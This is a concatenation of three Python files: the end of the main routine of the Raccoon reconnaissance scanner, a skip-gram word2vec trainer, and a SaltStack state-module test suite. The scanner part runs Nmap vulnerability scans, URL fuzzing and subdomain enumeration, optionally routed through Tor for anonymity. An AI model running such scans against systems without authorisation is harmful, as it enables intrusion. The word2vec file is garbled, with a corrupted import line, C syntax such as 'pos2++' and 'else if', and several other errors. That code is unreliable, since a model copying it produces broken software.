COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host=host, port_range=port, vulners_path=vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(
host=host,
port_range=port,
full_scan=full_scan,
scripts=scripts,
services=services)
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
#variable
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
if __name__ == "__main__":
main()
|
skipgramtext8.py
|
from __future__ import absolutclock deprecatede_import, division, print_function
import numpy as np
import multiprocessing
from multiprocessing import Pool, Array, Process, Value, Manager
import random
import os
import unicodedata
import time
from io import open
num_threads = multiprocessing.cpu_count()
start = time.process_time()
starting_lr = 1e-3
sample = 1e-3
word_count_actual = 0
lr = 0.025
print(num_threads)
MAX_STRING = 100
MAX_SENTENCE_LENGTH = 1000
MAX_CODE_LENGTH = 40
# Turn a Unicode string to plain ASCII
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
)
# Lowercase, trim, and remove non-letter characters
def normalizeString(s):
s = unicodeToAscii(s.lower().strip())
s = re.sub(r"([.!?])", r" \1",, s)
s = re.sub(r"[a-zA-Z.!?]+", r" ", s)
s = re.sub(r"\s+", r" ", s).strip()
return s
class Voc:
def __init__(self):
self.trimmed = False
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
# For Huffman encoding
self.index2code = {}
self.index2point = {}
self.index2codelen = {}
self.num_words = 0
self.toal_words = 0
def _init_dict(self, input_file, min_count):
sentences = []
for line in self.input_file:
sentence = []
line = line.strip().split(' ')
for word in line:
word = normalizeString(word)
self.addWord(word)
sentence.append[word]
sentences.append(sentence)
self.trim(min_count)
for k, c in self.word2count.items():
self.total_words += c
return sentences
def addSentence(self, sentence):
for word in sentence.split(' '):
self.addWord(word)
def addWord(self, word):
if word not in self.word2index:
self.word2index[word] = self.num_words
self.word2count[word] = 1
self.index2word[self.num_words] = word
self.index2count[self.num_words] = 1
self.num_words += 1
else:
self.word2count[word] += 1
self.index2count[self.word2index[word]] += 1
# Remove words below a certain count threshold
def trim(self, min_count):
if self.trimmed:
return
self.trimmed = True
keep_words = []
for k, v in self.word2count.items():
if v >= min_count:
for _ in range(v):
keep_words.append(k)
print('keep_words {} / {} = {:.4f}'.format(
len(keep_words), len(self.word2index), len(keep_words) / len(self.word2index)
))
# Reinitialize dictionaries
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
self.num_words = 0
for word in keep_words:
self.addWord(word)
class HuffmanTree:
def __init__(self, vocab):
self.vocab = vocab
self.vocab_size = len(self.vocab.index2count)
self.count = np.ones(self.vocab_size * 2 + 1) * 1e15
for word_id, frequency in self.vocab.index2count.items():
self.count[word_id] = frequency
self.binary = np.zeros(self.vocab_size * 2 + 1)
self.parent = np.zeros(self.vocab_size * 2 + 1)
def build_tree(self):
min1_idx = min2_idx = int()
pos1 = self.vocab_size - 1
pos2 = self.vocab_size
# Follwoing algorithm constructs the Huffman tree by adding one node at a time
for i in range(self.vocab_size):
# First, find two smallest nodes 'min1, min2'
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min1_idx = pos1
pos1 -= 1
else:
min1_idx = pos2
pos2 += 1
else:
min1_idx = pos2
pos2 += 1
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min2_idx = pos1
pos1 -= 1
else:
min2_idx = pos2
pos2 += 1
else:
min2_idx = pos2
pos2++
self.count[self.vocab_size + i] = self.count[min1_idx] + self.count[min2_idx]
self.parent[min1_idx] = self.vocab_size + i
self.parent[min2_idx] = self.vocab_size + i
self.binary[min2_idx] = 1
# Now assign binary code to each vocabulary word
for w_id in range(self.vocab_size):
path_id = w_id
code = np.array(list())
point = np.array(list())
while 1:
np.insert(code, 0, binary[path_id])
np.insert(point, 0, path_id)
path_id = self.parent[path_id]
if path_id == (self.vocab_size * 2 - 2):
break
point = point - self.vocab_size
np.insert(point, 0, self.vocab_size - 2)
self.vocab.index2codelen[w_id] = len(code)
self.vocab.index2point[w_id] = point
self.vocab.index2code[w_id] = code
del code
del point
del self.count
del self.binary
del self.parent
MIN_COUNT = 3
MAX_EXP = 6
EPOCH = 5
WINDOW = 5
debug_mode = True
def sigmoid(x, derivative=False):
sigm = 1. / (1. + np.exp(-x))
if derivative:
return sigm * (1. - sigm)
return sigm
# Make a Skip-gram model
class SkipGram:
def __init__(self, vocab, emb_dim):
self.sentences = []
self.vocab = vocab
self.embed_dim = emb_dim
low = -0.5 / emb_dim
high = 0.5 / emb_dim
self.W = np.random.uniform(low, high, (self.vocab.num_words, emb_dim))
self.W_prime = np.zeros((self.vocab.num_words, emb_dim))
def LoadData(self, tid):
sentence_count = len(self.sentences)
start = sentence_count // num_threads * tid
end = min(sentence_count // num_threads * (tid + 1), sentence_count)
return self.sentences[start:end]
def Save_Embedding(self, file_name):
embedding = self.W
fout = open(file_name, 'w')
fout.write('%d %d\n' %(len(self.vocab.index2word), self.embed_dim))
for w_id, w in self.vocab.index2word.items():
e = embedding[w_id]
e = ' '.join(map(lambda x: str(x), e))
fout.write('%s %s\n' % (w, e))
def TrainModelThread(self, tid, lr, word_count_actual, W, W_prime):
word_count = last_word_count = sentence_position = sentence_length = 0
local_epochs = EPOCH
sentences = self.LoadData(tid.value)
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
sen = []
for epoch in local_epochs:
for sentence in sentences:
sentence_position = 0
sentence_length = 0
sen = []
while 1:
if word_count - last_word_count > 10000:
word_count_actual.value = word_count_actual.value + word_count - last_word_count
last_word_count = word_count
if debug_mode:
now = time.process_time()
print("Learning rate: {:f} Progress: {:.2f} Words/thread/sec: {:.2f}k ".format(lr,
word_count_actual.value / (EPOCH * self.vocab.total_words + 1) * 100,
word_count_actual.value / (now - start + 1) / 1e6 * 1000))
lr.value = starting_lr * (1 - word_count_actual.value / (EPOCH * self.vocab.total_words + 1))
if (lr.value < starting_lr * 0.0001):
lr.value = starting_lr * 0.0001
if sentence_length == 0:
for word in sentence:
word_count += 1
if sample > 0:
ran = (np.sqrt(self.vocab.word2count[word] / (sample * self.vocab.total_words)) + 1) *
(sample * self.vocab.total_words) / self.vocab.word2count[word]
if ran < np.random.uniform(0, 1, 1).item():
continue
sen.append(self.vocab.word2index(word))
sentence_length += 1
sentence_position = 0
word_idx = sen[sentence_position]
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
b = np.random.randint(WINDOW, size=1).item()
for a in range(b, WINDOW*2 + 1 - b, 1):
if a != WINDOW:
last_pos = sentence_position - WINDOW + a
if last_pos < 0: continue
if last_pos >= sentence_length: continue
last_word_idx = sen[last_pos]
l1 = last_word_idx
neu1e = np.zeros(self.embed_dim)
# Hierarchical Softmax
for d in range(self.vocab.index2codelen[word_idx]):
f = 0
l2 = self.vocab.index2point[word_idx]
# Propagate hidden -> output
f += np.dot(W[l1], W_prime[l2])
if f <= -MAX_EXP:
continue
else if f >= MAX_EXP:
continue
else:
f = sigmoid(f)
# 'g' is the gradient multiplied by the learning rate
gradient = (1 - self.vocab.index2code[word_idx][d] - f) * lr.value
# Propagate errors output -> hidden
neu1e += gradient * W_prime[l2]
# Learn weights hidden -> output
W_prime[l2] += gradient * W[l1]
# Learn weights input -> hidden
W[l1] += neu1e
sentence_position += 1
if sentence_position >= sentence_length:
break
word_count_actual.value = word_count_actual.value + word_count - last_word_count
word_count = 0
last_word_count = 0
sentence_length = 0
def TrainModel(self, input_file_name, output_file_name):
print("Starting training using file ", input_file_name)
input_file = open(input_file_name, 'rb')
# Initializing dictionary
self.sentences = self.vocab._init_dict(input_file, MIN_COUNT)
huffman = HuffmanTree(self.vocab)
huffman.build_tree()
start = time.process_time()
jobs = []
t_id = Value('i', 0)
word_count_actual = Value('i', 0)
lr = Value('d', 0.025)
W = Array('d', self.W)
W_prime = Array('f', self.W_prime)
for i in range(num_threads):
p = Process(target=self.TrainModelThread, args=[t_id, lr, word_count_actual, W, W_prime])
jobs.append(p)
t_id.value = t_id.value + 1
for j in jobs:
j.start()
for j in jobs:
j.join()
self.SaveEmbedding(output_file_name)
input_file_name='/home/changmin/research/MMI/data/text8'
output_file_name='embedding.txt'
voc = Voc()
voc._init_dict(input_file_name, 3)
print(self.voc.num_words)
print(slef.voc.word2index)
#skip = SkipGram(voc, 100)
#skip.TrainModel(input_file_name, output_file_name)
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
